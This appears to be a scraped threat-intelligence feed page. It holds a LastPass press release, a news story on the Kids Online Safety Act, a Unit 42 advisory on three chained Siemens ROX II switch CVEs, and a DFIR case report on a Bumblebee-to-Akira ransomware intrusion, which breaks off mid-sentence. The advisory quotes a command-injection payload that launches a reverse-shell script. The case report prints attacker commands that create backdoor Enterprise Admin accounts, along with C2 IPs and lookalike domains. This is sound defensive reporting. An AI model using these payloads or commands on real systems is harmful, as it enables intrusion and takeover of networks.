Search/pivotal
Vendor

pivotal

Known CVEs
0
Highest CVSS
In KEV
0
Vendor
cloud foundry container runtime
Connections
81 relationships
LastPass enhancements improve visibility, governance, and control
LastPass enhancements improve visibility, governance, and control LastPass announced a series of strategic product innovations, customer experience enhancements, and industry milestones. These advancements reflect the company’s continued focus on providing practical tools to protect access and identity in an increasingly AI-driven threat landscape. Highlights include new tools that simplify access management, enhancements that help customers get more value from LastPass, and milestones that demonstrate the company’s continued growth and industry leadership. The LastPass commitment to visibility, governance, and control comes at a pivotal moment. According to IBM’s 2026 Cost of a Data Breach Report, the average data breach now costs organizations $4.99 million, a record high and 12% increase over last year. The report also found AI-driven attacks increased 56%, adding an average of $1 million to breach costs, and 92% of organizations experiencing AI-related breaches lacked appropriate AI access controls. “As threat actors continue to automate and accelerate their attack tactics, strong identity, credential, and access management have become foundational security requirements, particularly for small and midsize businesses with limited resources,” said Karim Toubba, CEO of LastPass. “To address these evolving challenges, LastPass is dedicated to delivering the innovations that help organizations and individuals reduce risk while making security easier to manage.” LastPass introduced numerous enhancements across SaaS Monitoring and SaaS Protect within its flagship Business Max offering to help businesses navigate increasingly complex SaaS landscapes with greater visibility, oversight, and confidence. This includes: Always-on SaaS Monitoring: Persistent Monitoring maintains continuous visibility through a permanent connection to the LastPass browser extension, ensuring monitoring remains active even when users are signed out of LastPass. More flexible SaaS Protect controls: Expanded usage rules allow administrators to create more granular policies for specific users or groups, enabling organizations to apply security controls based on their unique needs. Together, these enhancements help organizations accelerate adoption, reduce manual workloads, improve security coverage, and strengthen policy enforcement by giving administrators more control over how and where security policies are applied. As of July, all enhancements have been fully released, including Persistent Monitoring across all browser extensions. LastPass launches Mobile Smart Scanner With the launch of Mobile Smart Scanner, LastPass empowers businesses and individuals across all product offerings to: Use the LastPass Mobile app to scan passwords from printed lists, screenshots, handwritten notes, and other physical sources and turn them directly into editable, autofill-ready credentials. Reduce manual data entry, saving time and minimizing errors. Simplify password management, keeping credentials secure in encrypted vaults rather than vulnerable on notes or memory. LastPass transforms user experience with enhanced, high-efficiency community platform Building on its commitment to customer success, LastPass introduced a redesigned Community experience that streamlines how customers discover trusted information, connect with peers, and get more value from the platform. With a more intuitive interface and expanded self-service resources, including topical portals and AI-powered search, the enhanced LastPass Community helps users across all product offerings quickly access the knowledge they need to strengthen security and resolve questions faster. The LastPass Community is part of a broader, integrated self-service strategy designed to meet customers at their point of need — whether that’s through the company’s branded community or across social platforms like Reddit and LinkedIn. LastPass security and UX improvements Security and compliance milestone For the second consecutive year, LastPass successfully completed independent SOC 2 and ISO 27001/27701 audits with zero findings, reinforcing the company’s commitment to security and providing customers with assurance that LastPass controls meet globally recognized standards. Dark web monitoring (DWM) auto-enrollment LastPass has enacted a phased rollout to automatically enroll all consumer accounts in DWM, transitioning the service from a historically opt-in experience to a more proactive protection model. This update helps ensure more customers can benefit from credential exposure monitoring without requiring additional setup, helping users identify potential risks and take action to protect their accounts. Dark web monitoring from LastPass consistently checks user information against databases of compromised credentials, and issues immediate alerts if any personal data is found on dark web sites. With 24/7 monitoring, users can take near real-time action, such as changing their password, to protect themselves. LastPass DWM also notifies users of potential threats like weak passwords, helping them stay ahead of threat actors. Admin console consolidation LastPass officially completed the transition from its Legacy Admin Console to a single Unified Admin Console, creating a more consistent and streamlined experience for administrators across business offerings. By consolidating management capabilities into one centralized platform, LastPass enables faster product improvements while simplifying how admins manage users, security controls, and access policies. Simplified organization-wide onboarding for all business customers A new company-wide sign-up link allows Teams, Business, and Business Max customers to onboard their entire organization to LastPass through a single shareable link, reducing administrative effort and accelerating deployment.
helpnetsecurity.comSep 1, 2026extracted
Kids’ online safety bill faces dim prospects of passage this session despite progress
Kids’ online safety bill faces dim prospects of passage this session despite progress The landmark kids’ online safety legislation that has perennially struggled in Congress despite garnering strong support appears to once again be in danger of stalling due to a deep divide between the chambers and a short legislative calendar. The Kids Online Safety Act (KOSA) advanced out of the Senate Commerce Committee last Wednesday, drawing applause from lawmakers, families and advocates who have long fought for the bill. But those same supporters acknowledge a long road ahead for legislation that, despite mounting political pressure to act, many think will be difficult to pass this session. While certain differences will kill the bill if left unresolved, experts and advocates are still cheering the compromises they have won from lawmakers who have flipped positions and agreed to tougher standards on some issues. s. However, the two chambers are split on whether to include in the legislation a “duty of care,” a central provision of the Senate bill that legally requires companies to act with reasonable caution to prevent causing foreseeable harm. House leaders strongly oppose including such language, which would expose industry to a raft of negligence lawsuits and has been criticized by privacy and civil liberties advocates. Even experts without an official stance on the legislation warn that a duty of care is difficult to make work because it’s challenging to define and to implement parameters for what content is harmful. Establishing a duty of care for online safety also would require that platforms use highly effective age verification tools, including by collecting government IDs and capturing biometric data. Duty of care is “where all the friction has been all these years, and until there's some kind of compromise on that — and at this point everyone's dug in — it's really just difficult to move forward,” said John Perrino, an expert at the Internet Society who has been tracking KOSA for five years and has not taken a position on the legislation. KOSA opponents argue the bill’s vague duty of care language threatening companies with large fines if they fail to prevent “harms” will cause industry to overcorrect and begin banning educational content about being gay or about how to eat healthily, due to concerns about content promoting eating disorders. Even without an overcorrection, advocates warn the proposed limits violate citizens’ First Amendment right to free speech and will keep people from being able to access important information. While there’s a possibility the bill, or a version of it, will pass before the end of the session in January, Perrino said it will be “incredibly challenging to make that work.” ‘Incentives for censorship’ KOSA was first introduced in 2022 and a version has been reintroduced every year since. The bill advanced to a vote in the full Senate for the first time last Congress, passing the chamber in a landslide 91-3 vote. The legislation then died in the House due to strong opposition from leadership, who at the time cited the First Amendment concerns. In a December 2024 interview, House Speaker Mike Johnson told a reporter lawmakers have to be sure that passing KOSA with a duty of care doesn’t “open the door for violations of free speech.” Around the same time, Johnson also reportedly told journalists the legislation was “overbroad” and could “go too far.” KOSA will allow the government to “create incentives for censorship,” Kate Ruane, director of the Free Expression Project at the Center for Democracy and Technology, told Recorded Future News. Then there are those on the other side who say removing duty of care would neuter the law. Sen. Marsha Blackburn (R-TN), who has led the effort to pass KOSA with a duty of care provision included, said House leaders’ position in opposition will be a dealbreaker if they don’t pivot. The House passed its version of KOSA, without a duty of care, as part of a larger package of bills in June. “The Senate cannot and will not accept the version that the House passed earlier,” Blackburn said at the Wednesday markup. “It is toothless, and it is a very pale imitation of the Senate version, and therefore it is a pale imitation of big tech accountability.” The bill’s fate rests in the hands of Majority Leader John Thune (R-SD), who will now decide whether to convene a full Senate roll-call vote amid many competing priorities. It is unlikely the bill would pass by voice vote, and Thune may want to avoid the time-consuming cloture process, making it possible the leader won’t call a vote, according to Josh Withrow, a resident fellow at the R Street Institute who opposes a duty of care provision. “Given the very few remaining days on the calendar this year before the election, even getting the bill passed through the whole Senate again this year is a little bit of a struggle, much less reaching an agreement with the House,” he said. The fact that House leadership is ready to defy a growing popular uprising against big tech over the inclusion of a duty of care — and take the resulting political hit — underscores how extreme and potentially unconstitutional the provision is, Withrow said. Gaining momentum While it does not seem likely that KOSA will make it through Congress before the midterms, it is possible the bill could get traction during the lame duck session between November and January. The political calculus could change after an election cycle that is expected to lean heavily Democratic, said the Free Expression Project’s Ruane. According to Josh Golin, executive director of the child advocacy group Fairplay, kids’ online safety advocates are pleased with the progress they have made this session even if final passage is in doubt. One major roadblock was a provision that would have preempted state-level kids’ online safety laws. It was removed from the House version of the bill in June following intense bipartisan negotiations in the chamber’s Energy and Commerce committee. The parents of children who have died due to bullying, sextortion and the promotion of eating disorders on social media played a pivotal role in the negotiations. “Preemption was a huge difference between the House and the Senate,” Golin said. “That got resolved. … That gives you hope that the duty of care can be worked out.” Congress also reached a compromise on the so-called knowledge standard for the first time in this session, he said. A knowledge standard refers to what a defendant is thinking while acting and is used to determine how much legal liability they face based on their knowledge of their actions. After long pushing an “actual” knowledge standard — which Golin said has allowed platforms to illegally collect data belonging to kids under 13 simply because they self-report as older — House lawmakers have agreed to a tougher “constructive knowledge” standard, which deems platforms responsible for what they should know, not just what they actually know. Inching closer All sides agree that potential inclusion of a kids’ online safety duty of care provision is a thornier dispute and will therefore be harder to resolve. “There's a lot of uncertainty,” Internet Society’s Perrino said. “The challenge of the duty of care is who's determining what's reasonable and what's not? That can, of course, change from administration to administration.” But the public is increasingly angry and wants big tech reigned in so lawmakers are feeling intense pressure, Golin said. He remains hopeful that a version of the bill with a duty of care will ultimately pass, even if not this session. “There are tremendous hurdles,” he said. “But I do think if we pass out of the Senate, it will be the first time that both the House and the Senate have passed a version of KOSA and their versions have moved closer to each other than they were a year ago.” “There are some key fundamental differences that need to be resolved, and it is possible those cannot be resolved, but we are certainly closer than we have ever been before.” Maurine Molak, a mother whose 16-year-old son David killed himself due to cyber bullying on social media platforms, has been deeply involved in the Congressional negotiations over KOSA for four years and echoed Golin’s optimism. She co-founded Parents SOS, an advocacy group for grieving parents fighting big tech, and has flown to Washington, D.C. from her home in Texas more than 20 times to meet with lawmakers sculpting the legislation. Her side, she said, has “never been in this good a position.” “We have worked so hard on this bill for four years,” Molak said. “Me and many of the other parents who have shared the very worst days of our lives with these House members — we are not giving up.” Editor's note: A previous version of this article used an incorrect first name for John Perrino. Suzanne Smalley is a reporter covering digital privacy, surveillance technologies and cybersecurity policy for The Record. She was previously a cybersecurity reporter at CyberScoop. Earlier in her career Suzanne covered the Boston Police Department for the Boston Globe and two presidential campaign cycles for Newsweek. She lives in Washington with her husband and three children.
therecord.mediaAug 11, 2026extracted
Three Steps to the Terminal: A Siemens ROX II Zero-Day Trilogy
We conducted this research in close partnership with Siemens, reflecting our shared commitment to advancing the security and resilience of critical infrastructure. This report details a critical, chained exploit comprising three zero-day vulnerabilities (CVE-2025-40948, CVE-2025-40947, and CVE-2025-40949) discovered in Siemens ROX II operational technology (OT) switches. Successful exploitation of this chain would allow an attacker to achieve full privilege escalation and persistent root-level access on these devices, which are critical components of industrial control networks. The vulnerabilities range from Medium to Critical severity, with CVSS 3.1 scores of 6.8 (CVE-2025-40948), 7.5 (CVE-2025-40947), and 9.1 (CVE-2025-40949). The attack vector proceeds in three stages, escalating from reconnaissance to complete system compromise: Arbitrary file disclosure (CVE-2025-40948): An attacker leverages an insecure configuration of the xz utility, which executes with root privileges, to read any file on the switch’s file system. This vulnerability enables initial reconnaissance that could reveal critical information such as sensitive configuration files, password hashes and private cryptographic keys. Privilege escalation via command injection (CVE-2025-40947): This critical flaw resides in the feature key validation function. The function fails to sanitize an attacker-controlled payload before inserting it directly into a command executed with root privileges. Exploiting this allows for direct command injection and full root access. Persistent root code execution (CVE-2025-40949): Following privilege escalation, the final vulnerability is exploited in the switch’s web management task scheduler. Improper input sanitization allows an authenticated attacker to inject malicious commands into the system’s root cron table. This establishes persistent code execution, surviving system reboots and maintaining full control. These vulnerabilities could collectively transform a vital network security device into a platform for malicious activity, severely threatening the integrity and availability of the industrial network. Siemens has released security advisories SSA-973901, SSA-078743 and SSA-081142 to address these issues, which recommend that customers update their affected ROX II devices to firmware version V2.17.1. Palo Alto Networks customers are better protected against these threats through the following products and services: Virtual patching detection signatures available via the Next-Generation Firewall with Advanced Threat Prevention OT Device Security If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team. The Palo Alto Networks OT Threat Research Lab and Siemens partnered to advance the security and resilience of critical infrastructure through collaborative vulnerability research on the Ruggedcom ROX II platform. We combined the OT Threat Research Lab’s expertise in industrial cybersecurity research with Siemens’ deep product knowledge and the coordination capabilities of Siemens ProductCERT. These teams worked together to identify, validate, remediate and responsibly disclose security vulnerabilities. This collaboration reflects the growing importance of industry partnerships in securing OT environments. As critical infrastructure enters the AI era, organizations must work together more closely than ever to address emerging threats, accelerate vulnerability remediation and strengthen the security of the technologies that support essential services worldwide. This partnership demonstrates how coordinated research and responsible disclosure can help build a more resilient and secure future for critical infrastructure. The modern OT environment is a complex network of devices working in concert. At the heart of this connectivity are OT switches, which act as the nervous systems of industrial networks, directing communication between critical assets like human-machine interfaces (HMIs) and programmable logic controllers (PLCs). Protecting the integrity and availability of these switches is paramount for any industrial operation, be it a factory floor or a power plant. For instance, a properly configured OT switch provides crucial network segmentation, which enhances security by isolating different parts of the network while still allowing necessary communication. However, OT switches designed to secure the network can themselves become attack surfaces. A common misconception is that because these devices are often air-gapped or sit on isolated networks, they’re inherently safe. In reality, they are just as susceptible to software vulnerabilities as any other IT equipment, allowing an unprivileged attacker to exploit software flaws, escalate privileges and disrupt OT communication. This threat research article demonstrates how seemingly benign flaws can be exploited to initiate a chain of events. In this case, this could lead to full control of the critical OT switch operating system ROX II. The first vulnerability, CVE-2025-40948, is an arbitrary file disclosure vulnerability. While not immediately devastating, this flaw provides vital intelligence by revealing sensitive information on the switch operating system (OS), from password hashes to network topology data. This initial foothold is a crucial step in a sophisticated attack. The second vulnerability, CVE-2025-40947, is the pivotal privilege escalation flaw. We identified this vulnerability by carefully analyzing the switch’s feature key functionality, a mechanism designed to unlock optional capabilities. By reverse-engineering this feature, we discovered a way to exploit its internal logic and gain root access. This vulnerability grants an attacker total control, bypassing available security measures and transforming the switch into a platform for malicious activity. The third vulnerability, CVE-2025-40949, solidifies the attacker’s control by exploiting the switch’s task scheduling functionality. An authenticated attacker can schedule malicious scripts to run with root privilege at predetermined intervals, ensuring persistence even after a reboot. This allows for ongoing malicious activity, such as data exfiltration or denial-of-service attacks, making the compromise difficult to detect or remove. Exploit Chain Part 1: Exploiting CVE-2025-40948, Then Misusing xz for File System Information Disclosure During the initial analysis of the switch’s publicly available firmware, we worked with Siemens researchers and located a key configuration file associated with a privileged daemon. This file is used by a management and configuration daemon running with root privileges on the switch’s operating system. As a root-privileged process, it can perform any action on the system, including reading and writing any file. The xz command is a common Linux utility primarily used for compressing files into the XZ format with a highly effective compression algorithm. However, xz can be used with specific parameters to function like the standard Linux cat command, which is used to print files to standard output. By supplying the parameters -f, -c and -d at the same time, an attacker can instruct xz to view file contents. The CVE-2025-40948 vulnerability lies in the privileged daemon executing the xz command with user-provided parameters. Since the process runs as root, an attacker can pass any file path to xz, allowing it to read any file on the file system, including those normally inaccessible to regular users. This insecure configuration creates a significant arbitrary file disclosure vulnerability. An attacker can leverage this to: Read sensitive configuration and system files containing credential information Access private keys or other cryptographic materials Gather information about the system and network, paving the way for further attacks In the case of the ROX II switch, this oversight would have allowed an attacker to leak the contents of any file on the file system. This highlights the importance of carefully vetting all commands executed by privileged processes and ensuring that user input is never used to construct commands insecurely. To understand CVE-2025-40947, we must first understand how the Siemens feature key mechanism works. A feature key is a cryptographically signed license that enables specific functionalities on the switch. When a customer purchases a license, Siemens provides a signature (i.e., the feature key) that the customer installs on the device. The switch then uses a pre-installed public key to verify the feature key’s authenticity and enable the corresponding features. This process is intended to be secure, but our analysis revealed a critical flaw in its implementation. By reverse engineering the feature key handling library (responsible for installation), we identified the CVE-2025-40947 vulnerability in its signature verification function. This function is responsible for validating the signature provided in the feature key. The function involves three important steps: Read and parse: The function reads from the feature key file and parses a signature line containing up to a fixed number of characters Command preparation: It then prepares a Linux command to verify the signature using the gpgv utility, inserting the parsed signature string directly into the command Command execution: Finally, it executes the constructed command using system() with root privileges The code excerpt in Figure 1 shows how the signature is copied into the command string before being executed. This is the root cause of the command injection vulnerability, as there is no sanitization or validation of the input signature before it is inserted into the command string. To exploit this vulnerability, an attacker needs to craft a payload that fits within the signature field size limit. The exploitation process involves two main steps: File upload: The attacker first uses the web UI’s normal file upload functionality for a feature key to upload a malicious script (e.g., a Python reverse shell) to a writable directory on the switch. Command injection: Next, the attacker crafts a new feature key file where the signature field contains a command injection payload. This payload is designed to execute the malicious script that was previously uploaded. For example, a payload like $(python /tmp/rev_shell.py) could be used, where /tmp/rev_shell.py is the uploaded script. When the attacker uploads this specially crafted feature key, the vulnerable verification function will execute the injected command with root privileges, giving the attacker a reverse shell and full control over the device. This attack vector highlights the importance of robust input validation and secure coding practices, especially when handling external data and executing system commands. Following the initial privilege escalation, we discovered a third critical vulnerability, CVE-2025-40949, in the Siemens ROX II switch's system scheduling functionality. This flaw allows an authenticated attacker to establish persistent execution of arbitrary commands with root privileges. The vulnerability resides in the switch’s system task scheduler, which is used to automate periodic command execution. An authenticated attacker can manipulate input fields within the web management interface used to configure scheduled tasks. Due to improper sanitization and validation of user-supplied data, the attacker can inject control characters and commands into the underlying system configuration file responsible for task execution. This technique results in a command injection attack executed with root privileges. The impact is persistent code execution as the root user, enabling long-term compromise that survives system reboots and maintains control over the device. Exploiting this vulnerability involves several steps that an authenticated attacker can perform via the web management interface. This high-level summary demonstrates how persistent root access is achieved. Step 1 - Prepare the malicious code: The attacker prepares malicious code, such as a script designed for communication or system manipulation. This payload is stored in a location accessible by the switch's operating system. Step 2 - Inject the command: The attacker uses the task scheduler interface to create a new scheduled task. By crafting a special input string for some of the task configuration fields, the attacker is able to inject an execution command. This command is structured to overwrite or bypass the intended task parameters, causing the system to execute the attacker’s payload instead of a legitimate function. Step 3 - Execute and achieve persistence: Once the configuration is saved, the scheduled task mechanism processes the injected command. This results in the execution of the attacker’s prepared code with root privileges, achieving persistent control over the device. This control remains active through system operations, allowing for ongoing malicious activity. The discovery and mitigation of these three chained zero-day vulnerabilities in Siemens ROX II switches highlight the necessity of collaborative vulnerability research between vendors and security researchers. By working together to identify and remediate flaws that could allow full system compromise, the industry can better protect the critical infrastructure that underpins essential services. To protect the intricate and interconnected OT environment, organizations must execute a defense-in-depth strategy. This methodology must combine timely firmware updates with compensating controls, such as virtual patching. While applying vendor-provided security updates remains the recommended long-term remediation, organizations may require additional time to test and deploy patches within OT environments. Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block the attacks with best practices via the following Threat Prevention signatures 97246, 97250, 97249. OT Device Security provides deep visibility and AI-powered inline protection for industrial environments, securing critical OT assets and legacy systems without requiring downtime. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42) UK: +44.20.3743.3660 Europe and Middle East: +31.20.299.3130 Asia: +65.6983.8730 Japan: +81.50.1790.0200 Australia: +61.2.4062.7950 India: 000 800 050 45107 South Korea: +82.080.467.8774 Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance. System behavior indicators: Unusual task scheduler entries: - Description: Unexpected scripts or commands injected into the switch’s system configuration files or task scheduler configuration. These are typically characterized by the execution of arbitrary commands (e.g., python, bash or direct system calls) instead of legitimate task functions. Abnormal use of the xz utility: - Description: Execution of xz with parameters -f, -c and -d by the privileged configuration daemon. This indicates an attempt to read files on the file system that are not normally accessible to the user. CVE-2025-40947 – MITRE CVE Program CVE-2025-40948 – MITRE CVE Program CVE-2025-40949 – MITRE CVE Program Siemens ProductCERT and CERT - Hall of Thanks – Siemens SSA-078743: Remote Code Execution Vulnerability in Ruggedcom Rox Before V2.17.1 – Siemens ProductCERT SSA-081142: Arbitrary Code Execution Vulnerability in Ruggedcom Rox Before 2.17.1 – Siemens ProductCERT SSA-973901: Arbitrary File Disclosure Vulnerability in Ruggedcom Rox Before V2.17.1 – Siemens ProductCERT Adam Robbie, Head of OT Threat Research, Emmanuel Zhou, Sr. Staff Researcher and Rick Wyble, OT Security Researcher, are researchers affiliated with the Palo Alto Networks Advanced Research Center for OT. Miguel Pereira is from Siemens ProductCERT.
unit42.paloaltonetworks.comJul 17, 2026extracted
From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira
Key Takeaways In July 2025, BumbleBee malware was deployed via SEO poisoning through a trojanized installer for ManageEngine OpManager. Following initial access, BumbleBee dropped an AdaptixC2 beacon to facilitate further intrusion activities, allowing the threat actor to pivot to a domain controller and dump the NTDS.dit. The threat actor returned the following day and established an SSH proxy, enabling lateral movement across the network and data exfiltration via FileZilla and SFTP to an external server. The threat actor concluded the intrusion by deploying Akira ransomware across the root domain and returned two days later to encrypt a child domain. This case was first reported to customers in a threat brief released in July 2025 and in a public flash alert in August 2025 in partnership with Swisscom B2B CSIRT, which observed another intrusion tied to the same campaign. This report contains data from both intrusions. We plan to release a DFIR Labs case based on this report later this quarter. Case Summary The BumbleBee intrusion was initiated in July 2025 via an SEO poisoning attack that lured a user searching for “ManageEngine OpManager” to a look-alike domain. Upon downloading a trojanized MSI installer, the BumbleBee first-stage loader (msimg32.dll) was executed on a beachhead host via DLL side-loading. The loader immediately established command-and-control (C2) communication with threat actor-controlled infrastructure. Approximately five hours after the initial infection, the threat actor deployed AdgNsy.exe, a renamed instance of the legitimate Windows Address Book utility, which was injected with AdaptixC2 shellcode. This established a persistent C2 channel, enabling the threat actor to perform living-off-the-land discovery commands such as systeminfo and nltest to map the internal network. To ensure persistence, the threat actor created new domain accounts with Enterprise Admin privileges and installed RustDesk as a Windows service on multiple servers. On the second and third days, the threat actor moved laterally using RDP to pivot to a domain controller and a backup server. They engaged in extensive credential harvesting, utilizing wbadmin.exe to extract the NTDS.dit Active Directory database and executing custom PowerShell scripts to dump and decrypt Veeam credentials via DPAPI. The threat actor also employed the lsassy utility to dump LSASS memory across multiple hosts. Throughout the intrusion, the threat actor leveraged defense evasion and tunneling techniques. This included using a reverse SSH tunnel to proxy RDP traffic and bypass firewall restrictions, as well as employing mixed-case command-line obfuscation (e.g., pOWerShELl.exE). In a parallel incident, they even used a Bring Your Own Vulnerable Driver (BYOVD) attack to neutralize endpoint security controls. Data exfiltration was primarily facilitated through FileZilla, which the threat actor likely introduced into the environment via RDP clipboard. Over 75GB of data, including file shares, sensitive user credentials, and SYSVOL domain configurations were exfiltrated to an threat actor controlled server in Ukraine. The intrusion culminated approximately 44 hours after initial access with the deployment of Akira ransomware (staged as locker.exe), which used WMI to delete Volume Shadow Copies and maximize impact across the infrastructure. If you would like to get an email when we publish a new report, please subscribe here. The DFIR Report Offerings Check out our Products here and our Services here. Want a demo, more information on our services, pricing or just want to chat? Get in Touch Analysts Analysis and reporting completed by Jake, Dino, Ahmed Farouk & Mattison Schuch. Reviewed by Angelo Violetti & Renzon Cruz Initial Access The BumbleBee intrusion was initiated in July 2025 via a SEO poisoning attack. A user searching Bing for “ManageEngine OpManager”, a network monitoring suite, was lured to opmanager[.]pro, a sophisticated lookalike domain. This site served a cloned interface that redirected the victim to download-center[.]online, ultimately delivering a trojanized MSI installer instead of the legitimate software. Forensic analysis of the browser history mapped the sequence of redirects leading to the malicious host. The victim subsequently moved the malicious MSI to an internal network share; from there, an IT administrator executed the file on the beachhead host. Delivery Infrastructure This intrusion aligns with a broader BumbleBee SEO poisoning campaign that Cyjax first identified in May 2025. The operation utilized a standardized, two-tier delivery architecture: Tier 1: Impersonation Front-ends – Malvertising domains (e.g., opmanager[.]pro ,zenmap[.]pro ) that appeared in Bing search results. These sites served high-fidelity clones of legitimate download pages to establish trust. Tier 2: Universal Delivery Gateways – Backend servers hosting trojanized MSI installers. By using a uniform URL parameter (/Get?q= ), the same infrastructure could dynamically serve various malicious packages. This pattern is a reliable pivot point for researchers on platforms like urlscan.io. Two separate waves of activity were observed, masquerading as various enterprise software suites to facilitate BumbleBee infections. Technical analysis revealed significant infrastructure overlap across both waves: all download gateways resolved to Hostinger (AS47583) and utilized a shared code-signing certificate issued to “LLC Vector.” Potentially Related Campaign In October 2025, Zscaler documented a parallel campaign targeting user searching for Ivanti VPN. This operation used SEO poisoning to lure victims to a fraudulent download page, delivering a trojanized MSI designed to exfiltrate saved VPN credentials. This campaign exhibited a near-identical tactical fingerprint to the BumbleBee waves, specifically: Delivery Mechanics: A consistent two-tier model leveraging Bing SEO poisoning and the specific /Get?q= URL parameter. Infrastructure Overlap: Passive DNS analysis confirms that the Ivanti gateways (netml[.]shop ,shopping5[.]shop ) utilized the same Hostinger staging IP (84.32.84.32) as the Wave 1 gateway,soft-server[.]online . Naming Conventions: The Ivanti campaign employed the same ftp. subdomain pattern observed throughout Wave 2. Despite the infrastructure overlap, several key operational divergences distinguish this activity from the BumbleBee waves: Payload: The campaign distributed a dedicated VPN credential stealer rather than the BumbleBee loader. Signature Attribution: The MSI is signed by a Chinese entity (Hefei Qiangwei Network Technology), deviating from the Russian-based “LLCs” observed in previous waves. C2 Architecture: Upon execution, the stealer beaconed to a hardcoded Azure IP (4.239.95[.]1:8080 ), bypassing the Domain Generation Algorithm (DGA) infrastructure characteristic of BumbleBee Waves 1 and 2. Swisscom The Swisscom linked BumbleBee intrusion originated from a management server, where an IT administrator navigated to ip-scanner[.]org. This impersonation site masqueraded as the official Advanced IP Scanner portal to lure users into downloading a malicious payload. Although the site content had changed by the time of analysis, forensic inspection of the DOM tree revealed residual strings and metadata explicitly tied to Advanced IP Scanner, confirming its previous role as a deceptive lookalike domain. Execution BumbleBee – ManageEngine-OpManager.msi After copying the malicious MSI from the network share to a server, the infection started with the execution of ManageEngine-OpManager.msi from the user’s desktop. Forensic telemetry confirmed explorer.exe as the parent process, validating that the file was manually launched by the user. This successful initial access was the direct result of the threat actor’s masquerading tactics, which effectively leveraged a high-fidelity decoy to deceive the administrator into authorizing the installation. The choice to impersonate a ManageEngine installer indicates a deliberate effort to target high-value users, such as IT staff and System Administrators. These accounts typically possess elevated privileges and are often subject to fewer restrictions than standard user profiles. Furthermore, targeting these roles increases the likelihood of execution on critical infrastructure, including file servers and domain controllers. Technical analysis of the ManageEngine-OpManager.msi payload revealed a revoked code-signing certificate issued to “LLC Resource+.” Tracking provided by certgraveyard.org shows that this signer has a history of signing BumbleBee-related malware. The ManageEngine-OpManager.msi installer dropped three distinct binaries into %TEMP%\ApplicationInstallationFolder_11. This setup was designed to facilitate DLL side-loading: ManageEngine_OpManager_64bit.exe : The legitimate software used as a decoy to avoid user suspicion. consent.exe : A legitimate Windows binary leveraged to initiate the execution chain. msimg32.dll : The BumbleBee first-stage loader, which is automatically loaded by the legitimate process to bypass security detections. Interestingly, the metadata of msimg32d.dll is dictionary-derived gibberish, which is a known BumbleBee builder pattern across waves. They are extremely useful as a YARA signature because the strings collide essentially nowhere in benign software. consent.exe and DLL Side-Loading The ManageEngine-OpManager.msi functioned as a dual-purpose installer. While it deployed the authentic OpManager software to satisfy user expectations, it simultaneously stages a DLL side-loading attack within the %APPDATA% directory. By placing a legitimate, signed Windows binary (consent.exe) in the same folder as a malicious msimg32.dll, the threat actor exploits the Windows DLL search order. When the staged consent.exe was executed, it prioritized loading the local, malicious msimg32.dll over the legitimate version residing in C:\Windows\System32. This allowed the BumbleBee loader to run within the memory space of a trusted Windows process, effectively masking its presence from many signature-based security tools. Analysis provided by tria.ge showed that consent.exe and the legitimate OpManager installer were dropped and executed by the malicious MSI. The Sigma rule System File Execution Location Anomaly was triggered since it looks for execution of commonly abused Windows built-in binaries (consent.exe) outside of their normal path; in this case, the binary executed from the victim’s AppData folder. Upon execution, consent.exe loaded the malicious msimg32.dll (the BumbleBee loader). The loader immediately checked the system locale GetSystemDefaultLocaleName() and compared it against a hard-coded list of 27 CIS-region locales (Russia, Ukraine, Belarus, etc.). If a match was found, the loader terminated via ExitProcess(). If the loader passed the geofencing check, it began querying numerous dynamically generated domain names associated with the BumbleBee malware family. Swisscomm – Bumblebee In the Swisscom intrusion, the user downloaded Advanced-IP-Scanner.msi directly to a management server. This installer functioned as a malicious wrapper. It successfully deployed the legitimate Advanced IP Scanner software to avoid raising suspicion while simultaneously dropping the BumbleBee loader. Following the MSI’s execution, the malware staged additional artifacts in the %TEMP% directory, establishing the initial foothold on the server while the administrator proceeded with the expected utility. The malicious payload was staged immediately after the user granted administrative privileges via the User Account Control (UAC) prompt. Static analysis of the BumbleBee DLL (msimg32) revealed several anomalous strings within its PE metadata. Specifically, the ‘Original Filename’ and ‘Description’ fields contained values inconsistent with the legitimate Windows library, serving as a key indicator of its malicious nature. Furthermore, the digital signature on the msimg32 DLL was traced to a certificate issued to a Russian-based entity. This mirrored the signing patterns observed in previous BumbleBee waves, suggesting a consistent supply chain for their malicious binaries. Adaptix C2- AdgNsy.exe Following the initial BumbleBee beacon, the loader retrieved and executed AdgNsy.exe. Forensic analysis identified this file as a renamed instance of the legitimate WAB.exe (Windows Address Book) utility. The attack used this binary for process injection: the loader executed the masqueraded WAB.exe and injected it with Adaptix shellcode. This resulted in an active Adaptix C2 HTTP beacon that, in this instance, utilized default configuration settings for its communication profile. Deeper analysis of this activity is covered in the Defense Evasion section. ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding OriginalFileName: WAB.EXE CommandLine: C:\Users\ \AppData\Local\AdgNsy.exe Following the establishment of the C2 channel, the threat actor initiated discovery and enumeration activities. Analysis of the process telemetry revealed a series of living-off-the-land commands used to map the environment: Host/User Discovery: whoami ,systeminfo ,quser Domain/Network Reconnaissance: nltest ,ping Furthermore, they leveraged the beacon for internal network scanning, signaling the start of lateral movement preparation within the victim infrastructure. Swisscom – Adaptix C2 In the Swisscom incident, a 40-minute dwell time preceded the deployment of an Adaptix C2 agent. The loader dropped an authentic version of the Windows Contacts utility into a user-writable folder to facilitate process injection. This mechanism was used to execute Adaptix C2 shellcode, initiating an outbound connection to 170.130.55[.]223. Persistence Domain Account Creation On the initial day of the intrusion, the threat actor moved to establish persistent administrative access by creating two new domain accounts via net.exe. The account names backup_DA and backup_EA were likely chosen to blend in with legitimate administrative naming conventions: net user backup_DA P@ssw0rd1234 /add /dom net user backup_EA P@ssw0rd1234 /add /dom Following creation, the threat actor immediately performed privilege escalation by adding the backup_EA account to the Enterprise Admins group, granting them the highest level of authority across the entire Active Directory forest: net group "enterprise admins" backup_EA /add /dom Services Following the initial compromise, the threat actor used RDP to pivot to two internal servers. The objective was to install RustDesk, which was subsequently registered as a Windows service. Administrator Account Manipulation On the second day of the intrusion, the threat actor engaged in account takeover across high-value assets. By executing net user administrator P@ssw0rd!, they established direct control over local administrative contexts on the file and backup servers. The operation 